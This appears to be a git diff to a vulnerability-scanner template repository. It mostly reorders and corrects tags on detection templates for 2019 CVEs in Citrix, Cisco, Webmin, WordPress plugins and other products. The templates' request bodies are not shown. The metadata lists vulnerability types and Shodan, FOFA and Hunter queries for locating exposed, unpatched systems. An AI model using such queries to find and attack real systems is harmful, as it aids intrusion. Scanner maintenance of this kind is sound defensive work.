cve2019,cve,unauth,oast,tenable,citrix,rce http: - raw: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 7fd626326c..7ab60de095 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -27,7 +27,7 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" - tags: citrix,rce,unauth,oast,tenable,cve,cve2019 + tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: - raw: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index ff3b0942b3..a94a19bc7b 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -27,7 +27,7 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" - tags: rce,unauth,oast,tenable,cve,cve2019,citrix + tags: cve,cve2019,rce,unauth,oast,tenable,citrix http: - raw: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 6306d436ba..fe89a2d21e 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dir-600m_firmware - tags: packetstorm,edb,cve,cve2019,dlink,router,iot + tags: cve2019,cve,packetstorm,edb,dlink,router,iot http: - raw: diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 9a3a862227..ef4b147659 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: aptana product: jaxer - tags: cve,cve2019,lfi,edb,packetstorm,aptana + tags: cve2019,cve,lfi,edb,packetstorm,aptana http: - method: GET diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 9669cb0ead..f725dbe8b6 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: palletsprojects product: werkzeug - tags: cve2019,lfi,odoo,packetstorm,cve,palletsprojects + tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects http: - method: GET diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 0ecfd3be76..94ef01d253 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: instagram-php-api_project product: instagram-php-api - tags: wordpress,xss,wp-plugin,wpscan,packetstorm,cve,cve2019,instagram-php-api_project + tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project http: - method: GET diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index ae235e166b..d64c3c42bf 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: open-emr product: openemr - tags: lfi,authenticated,edb,cve,cve2019,openemr,open-emr + tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr http: - raw: diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 0ab540fb0b..5eb462745c 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: open-school product: open-school - tags: xss,open-school,packetstorm,cve,cve2019 + tags: cve,cve2019,xss,open-school,packetstorm http: - method: GET diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 4f04b29f73..ae3a0d993b 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -29,7 +29,7 @@ info: vendor: osticket product: osticket shodan-query: title:"osTicket" - tags: packetstorm,cve,cve2019,osticket,xss,intrusive + tags: cve,cve2019,packetstorm,osticket,xss,intrusive variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" user_pass: "{{rand_text_alphanumeric(12)}}" diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 4c1e0a4166..4e2e0f2adb 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -29,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar + tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar http: - raw: diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index a38c12c3df..8808f2cda5 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: sugarcrm product: sugarcrm - tags: cve2019,xss,sugarcrm,edb,cve + tags: cve,cve2019,xss,sugarcrm,edb http: - method: GET diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 1cfb7d83d7..6535461cb5 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webmin product: webmin - tags: packetstorm,cve,cve2019,webmin,rce,kev,edb + tags: cve,cve2019,packetstorm,webmin,rce,kev,edb http: - raw: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index cbbde31d75..b2fcdd0934 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -28,7 +28,7 @@ info: vendor: lsoft product: listserv shodan-query: http.html:"LISTSERV" - tags: cve,cve2019,xss,listserv,edb,lsoft + tags: cve2019,cve,xss,listserv,edb,lsoft http: - method: GET diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index f21ef7b9a0..a6f82b299a 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -28,7 +28,7 @@ info: product: gallery_photoblocks framework: wordpress publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" - tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs + tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: - raw: diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 45e1e8a98e..0e0a2ed143 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: socomec product: diris_a-40_firmware - tags: seclists,packetstorm,cve,cve2019,disclosure,socomec,diris,iot + tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot http: - method: GET diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index f4352df685..0cf50d48a0 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -28,7 +28,7 @@ info: vendor: wpdownloadmanager product: wordpress_download_manager framework: wordpress - tags: packetstorm,cve,cve2019,wordpress,xss,wp-plugin,wpdownloadmanager + tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager http: - method: GET diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 5644488f08..9bc14582ee 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: kartatopia product: piluscart - tags: piluscart,lfi,packetstorm,edb,cve,cve2019,kartatopia + tags: cve,cve2019,piluscart,lfi,packetstorm,edb,kartatopia http: - method: GET diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 0c3d0a7262..4d551755e7 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nazgul product: nostromo_nhttpd - tags: edb,cve,cve2019,rce,packetstorm,nazgul + tags: cve,cve2019,edb,rce,packetstorm,nazgul http: - raw: diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 6e60e634fd..720f790b2a 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -28,7 +28,7 @@ info: vendor: api_bearer_auth_project product: api_bearer_auth framework: wordpress - tags: packetstorm,cve,cve2019,wordpress,xss,wp-plugin,auth,api_bearer_auth_project + tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project http: - method: GET diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 66d9996a3b..eed987ad75 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -28,7 +28,7 @@ info: vendor: checklist product: checklist framework: wordpress - tags: xss,wp-plugin,packetstorm,cve,cve2019,wordpress,checklist + tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist http: - method: GET diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index b44446be1e..05e5480217 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: rv320_firmware - tags: packetstorm,kev,edb,cve,cve2019,cisco,router,exposure + tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure http: - method: GET diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 27bc513444..b77eef5d6f 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rconfig product: rconfig - tags: intrusive,rconfig,packetstorm,cve,cve2019,rce + tags: cve2019,cve,intrusive,rconfig,packetstorm,rce http: - method: GET diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index a24916a7c8..0d8840b945 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: dlink product: dir-655_firmware - tags: cve,cve2019,dlink,rce,router,unauth,kev + tags: cve2019,cve,dlink,rce,router,unauth,kev http: - raw: diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index 2dd84dec27..625909c3d4 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: metinfo product: metinfo - tags: metinfo,sqli,cve,cve2019 + tags: cve2019,cve,metinfo,sqli http: - method: GET diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 8c7de1ecdb..9357cd5a84 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: metinfo product: metinfo - tags: metinfo,sqli,cve,cve2019 + tags: cve,cve2019,metinfo,sqli http: - raw: diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 7aa9199c13..67d5b01463 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: yachtcontrol product: yachtcontrol - tags: rce,yachtcontrol,cve,cve2019,edb,packetstorm + tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm http: - method: GET diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 43a582a54b..7ce663a329 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -25,7 +25,7 @@ info: max-request: 100 vendor: zabbix product: zabbix - tags: fuzz,auth-bypass,login,edb,cve,cve2019,zabbix + tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix http: - raw: diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 9345749c85..bbe8eff1b6 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: jnoj product: jiangnan_online_judge - tags: cve,cve2019,jnoj,lfi + tags: cve2019,cve,jnoj,lfi http: - raw: diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 30cd43c8b8..1a49206f3f 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: apache product: solr - tags: kev,packetstorm,cve,cve2019,apache,rce,solr,oast + tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast http: - raw: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 480860f922..99e1d19df2 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -31,7 +31,7 @@ info: product: popup_maker framework: wordpress publicwww-query: "/wp-content/plugins/popup-maker/" - tags: wpscan,cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic + tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: - raw: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index dd845c014d..4209c988bd 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -29,7 +29,7 @@ info: vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 - tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive,cybelsoft + tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: - raw: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 34a8782d35..7e8dccb5cb 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -25,7 +25,7 @@ info: vendor: cisco product: evolved_programmable_network_manager shodan-query: http.title:"prime infrastructure" - tags: packetstorm,cve,cve2019,rce,fileupload,unauth,intrusive,cisco + tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco http: - raw: diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 90dee86243..34e2d0df4d 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: strapi product: strapi - tags: cve2019,strapi,auth-bypass,intrusive,edb,cve + tags: cve,cve2019,strapi,auth-bypass,intrusive,edb http: - raw: diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index 5c65e4d3ec..bd3a73989d 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: alliedtelesis product: at-gs950\/8_firmware - tags: packetstorm,seclists,allied,lfi,cve,cve2019,alliedtelesis + tags: cve,cve2019,packetstorm,seclists,allied,lfi,alliedtelesis http: - method: GET diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 31a33a596e..71ef6cca52 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_library - tags: cve2019,microstrategy,packetstorm,xss,seclists,cve + tags: cve,cve2019,microstrategy,packetstorm,xss,seclists http: - method: GET diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index fb8d51ac60..1b65302f63 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -28,7 +28,7 @@ info: vendor: heroplugins product: hero_maps_premium framework: wordpress - tags: wpscan,cve,cve2019,wordpress,xss,wp-plugin,maps,heroplugins + tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins http: - method: GET diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 18c3de9b42..80ea4dec8c 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: maxum product: rumpus - tags: xss,ftp,packetstorm,cve,cve2019,maxum + tags: cve,cve2019,xss,ftp,packetstorm,maxum http: - method: GET diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index f271323586..8048041574 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -30,7 +30,7 @@ info: product: sg200-50_firmware shodan-query: "/config/log_off_page.htm" censys-query: "services.http.response.headers.location: /config/log_off_page.htm" - tags: cve,cve2023,redirect,cisco + tags: cve,cve2019,redirect,cisco http: - raw: diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 889bb14fbb..2c72defd00 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: lfi,kev,packetstorm,cve,cve2019,citrix + tags: cve,cve2019,lfi,kev,packetstorm,citrix http: - method: GET diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 8434057f27..ca33ede3e6 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -29,7 +29,7 @@ info: vendor: ciprianmp product: phpmychat-plus google-query: inurl:"/plus/pass_reset.php" - tags: cve,cve2019,phpMyChat,xss,ciprianmp + tags: cve2019,cve,phpMyChat,xss,ciprianmp http: - method: GET diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index 32ccd1fe46..11c2039b14 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -28,7 +28,7 @@ info: vendor: icegram product: email_subscribers_\&_newsletters framework: wordpress - tags: cve2019,wordpress,wp-plugin,edb,packetstorm,cve,icegram + tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram http: - method: GET diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 991859b559..83fae9730a 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -25,7 +25,7 @@ info: vendor: laborator product: neon framework: wordpress - tags: cve,cve2019,xss,laborator,wordpress + tags: cve2019,cve,xss,laborator,wordpress http: - method: GET diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 3eb7cd9740..8d7e78385d 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: employee_records_system_project product: employee_records_system - tags: edb,cve,cve2019,rce,fileupload,intrusive,employee_records_system_project + tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project http: - raw: diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 233a427e71..e54350fdee 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -29,7 +29,7 @@ info: vendor: cththemes product: citybook framework: wordpress - tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss,cththemes + tags: cve,cve2019,wp-theme,wpscan,wordpress,citybook,xss,cththemes http: - method: GET diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 7fbc35b9de..d4151358e6 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: artica product: pandora_fms - tags: pandorafms,rce,cve,cve2019,authenticated,oast,artica + tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica http: - raw: diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 00a712f467..c4a0053414 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -28,7 +28,7 @@ info: vendor: influxdata product: influxdb shodan-query: InfluxDB - tags: unauth,db,influxdb,misconfig,influxdata + tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata http: - method: GET diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index 855b59f1dd..ccdd51cbd3 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: agile_plm - tags: packetstorm,kev,edb,cve,cve2019,oracle,weblogic,rce + tags: cve,cve2019,packetstorm,kev,edb,oracle,weblogic,rce http: - raw: diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index f891757e96..2781400a3a 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: oracle product: bi_publisher - tags: edb,cve,cve2019,oracle,xxe,oast + tags: cve,cve2019,edb,oracle,xxe,oast http: - raw: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 6a27ef1d8b..2f684d139e 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -28,7 +28,7 @@ info: max-request: 5 vendor: atlassian product: confluence - tags: packetstorm,cve,cve2019,atlassian,confluence,rce,authenticated,intrusive,kev + tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 6051fc2d0f..f9fe421a86 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -25,7 +25,7 @@ info: vendor: labkey product: labkey_server shodan-query: 'Server: Labkey' - tags: tenable,cve,cve2019,redirect,labkey + tags: cve2019,cve,tenable,redirect,labkey http: - method: GET diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 2539d10f01..a2f51520c1 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: crestron product: am-100_firmware - tags: tenable,cve,cve2019,oast,injection,kev,edb,rce,packetstorm,crestron + tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron http: - method: POST diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index eead723ef8..3ec8c147ed 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -30,7 +30,7 @@ info: vendor: revive-sas product: revive_adserver shodan-query: http.favicon.hash:106844876 - tags: edb,packetstorm,cve,cve2019,revive,adserver,rce,revive-sas + tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas http: - raw: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index fc5ef89be7..1ad65c9394 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -32,7 +32,7 @@ info: shodan-query: title:"phpmyadmin" fofa-query: body="pma_servername" && body="4.8.4" hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive + tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: - raw: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index d6b0bbcb92..6c72422b9e 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -30,7 +30,7 @@ info: vendor: qnap product: photo_station shodan-query: 'Content-Length: 580 "http server 1.0"' - tags: packetstorm,cve,cve2019,lfi,rce,kev,qnap,qts + tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss http: - raw: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index ad2a4b4cd4..ea712afe31 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: nortekcontrol product: linear_emerge_essential_firmware - tags: emerge,lfi,edb,packetstorm,cve,cve2019,nortekcontrol + tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol http: - method: GET diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 118d50779e..bd18530adf 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -29,7 +29,7 @@ info: vendor: nortekcontrol product: linear_emerge_essential_firmware shodan-query: http.title:"eMerge" - tags: emerge,xss,packetstorm,cve,cve2019,nortek,nortekcontrol + tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol http: - method: GET diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 999265ae02..847fa22a16 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -26,7 +26,7 @@ info: vendor: atlassian product: jira shodan-query: http.component:"Atlassian Jira" - tags: atlassian,jira,disclosure,packetstorm,cve,cve2019 + tags: cve,cve2019,atlassian,jira,disclosure,packetstorm http: - method: GET diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 1359fa24b8..b290722b78 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -27,7 +27,7 @@ info: vendor: atlassian product: jira_server shodan-query: http.component:"Atlassian Jira" - tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019 + tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone http: - method: POST diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index e70a27a5a3..7a1f0dc640 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -27,7 +27,7 @@ info: vendor: totaljs product: total.js framework: node.js - tags: cve,cve2019,totaljs,lfi,node.js + tags: cve2019,cve,totaljs,lfi,node.js http: - method: GET diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index 367d39182b..29e53839f2 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: digitaldruid product: hoteldruid - tags: packetstorm,cve,cve2019,xss,hoteldruid,edb,digitaldruid + tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid http: - method: GET diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index c7e174c99b..5ba804fc6d 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -26,7 +26,7 @@ info: vendor: gracemedia_media_player_project product: gracemedia_media_player framework: wordpress - tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019,gracemedia_media_player_project + tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project http: - method: GET diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index a338f72c45..08322376af 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: eq-3 product: ccu3_firmware - tags: 